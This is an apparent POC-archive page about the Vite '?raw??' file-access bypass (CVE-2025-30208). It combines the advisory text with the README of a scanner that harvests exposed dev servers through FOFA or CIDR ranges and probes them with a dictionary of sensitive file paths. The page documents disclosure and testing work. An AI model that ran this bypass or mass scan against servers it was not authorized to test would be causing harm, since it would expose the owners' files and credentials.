Associated Vulnerability
Title:Vite bypasses server.fs.deny when using `?raw??` (CVE-2025-30208)Description:Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.
Description
全网首发 The first Vite scanner on the entire network Automatic target asset collection via FOFA Multi-threaded concurrent scanning Automatic CSV report generation
Readme
# Vite Dev Server Vulnerability Scanner
### 一个内外网通吃的自动化扫描器
### [中文版说明点击此处](README-CN.md)
[](https://www.python.org/)
[](LICENSE)
[](https://fofa.info/)
An automated tool for scanning Vite development server vulnerabilities. This tool utilizes the FOFA API to collect potential targets and automatically detects specific vulnerabilities.
## Features
- Auto
- Automatic target asset collection via FOFA
- Multi-threaded concurrent scanning
- Automatic CSV report generation
- Manual
- Manual target asset collection via CIDR
- Multi-threaded concurrent scanning
- Import targets from TXT
- Import payload from TXT
- Automatic CSV report generation
## Screenshots - Auto Mode
## Screenshots - Manual Mode
## Requirements
- Python 3
- FOFA API account‘
## Vulnerability Details
- CVE ID: CVE-2025-30208
- Vulnerability Name: Vite Dev Server Unauthorized Access
- Description: The Vite development server contains an unauthorized access vulnerability that allows attackers to access sensitive information through specific URLs.
- Affected Versions: Vite versions >=6.2.0, <=6.2.2, >=6.1.0, <=6.1.1, >=6.0.0, <=6.0.11, >=5.0.0, <=5.4.14, <=4.5.9
- In plain terms: `server.fs.deny` is a configuration option in the Vite development server that restricts access to the server's file system. This option allows developers to set an array of regular expressions to block access to specific files. While this is an important security feature designed to prevent unauthorized access to sensitive files on the server, the mechanism can be bypassed by appending `?raw??` or `?import&raw??` to the URL. If the target file exists, its contents can be directly accessed. This leads to the following potential security risks:
- Reading arbitrary files on the server
- Accessing system configuration files
- Obtaining sensitive application information
- Probing server directory structure
## Configuration
Create a `.env` file in the project root directory with the following content:
```plaintext
FOFA_EMAIL=your_email@example.com
FOFA_KEY=your_fofa_api_key
COUNTRY=AU
```
Common country codes:
- CN: China
- US: United States
- AU: Austrailia
- DE: Germany
- CA: Canada
- FR: France
- GB: United Kingdom
- IN: India
- JP: Japan
- RU: Russia
- ZA: South Africa
- BR: Brazil
- MX: Mexico
- ES: Spain
- ...etc
## Usage - FOFA
```bash
pip install -r requirements.txt
python main.py
```
## Usage - CIDR
```bash
# Install dependencies
pip install -r requirements.txt
# Get help
python manual.py -h
usage: manual.py [-h] [-t TARGETS] [-f FILE] [-p PORTS] [-d DICT]
Vite Dev Server Vulnerability Scanner - Manual Mode
options:
-h, --help show this help message and exit
-t TARGETS, --targets TARGETS
Target IP addresses, supports single IP, CIDR format (e.g., 192.168.1.0/24) or
domain, separate multiple targets with commas
-f FILE, --file FILE Load targets from file (one target per line)
-p PORTS, --ports PORTS
Port list, separate with commas (default: 80,443,3000,5173,8080)
-d DICT, --dict DICT Custom dictionary file path (format: one path per line, lines starting with #
are ignored)
# Scan 192.168.1.0/24 with default ports
python manual.py -t 192.168.1.0/24
```
## Configuration Parameters
The following parameters can be adjusted in `main.py`:
- `MAX_PAGE`: Maximum number of query pages (default: 5)
- `RESULTS_PER_PAGE`: Results per page (default: 100)
- `TIMEOUT`: Request timeout in seconds (default: 10)
- `MAX_THREADS`: Maximum concurrent threads (default: 20)
## Output
Scan results will be saved in `vite_vulnerable_targets.csv` with the following fields:
- url: Target URL
- vulnerable_url: Vulnerability URL
- status_code: HTTP status code
- domain: Domain name
- ip: IP address
## Disclaimer
This tool is intended for security research and authorized testing only. Do not use for illegal purposes. Ensure you have proper authorization before testing any targets.
## License
[MIT License](LICENSE)
## References
- [NTST](https://nvd.nist.gov/vuln/detail/CVE-2025-30208)
- [Github Security Issue](https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w)
File Snapshot
[4.0K] /data/pocs/987c7a886dc01cc9c945426dcfab302ee952ee87
├── [4.0K] images
│ ├── [101K] clihelp.png
│ ├── [ 97K] colorful_main.png
│ ├── [838K] image.png
│ ├── [309K] manual1.png
│ └── [104K] result.png
├── [1.0K] LICENSE
├── [6.9K] main.py
├── [ 11K] manual.py
├── [4.3K] README-CN.md
├── [4.5K] README.md
├── [ 137] requiremens.txt
├── [1.8K] sensitive_files.json
├── [2.6K] sensitive_urls.txt
└── [ 19] targets.txt
1 directory, 14 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →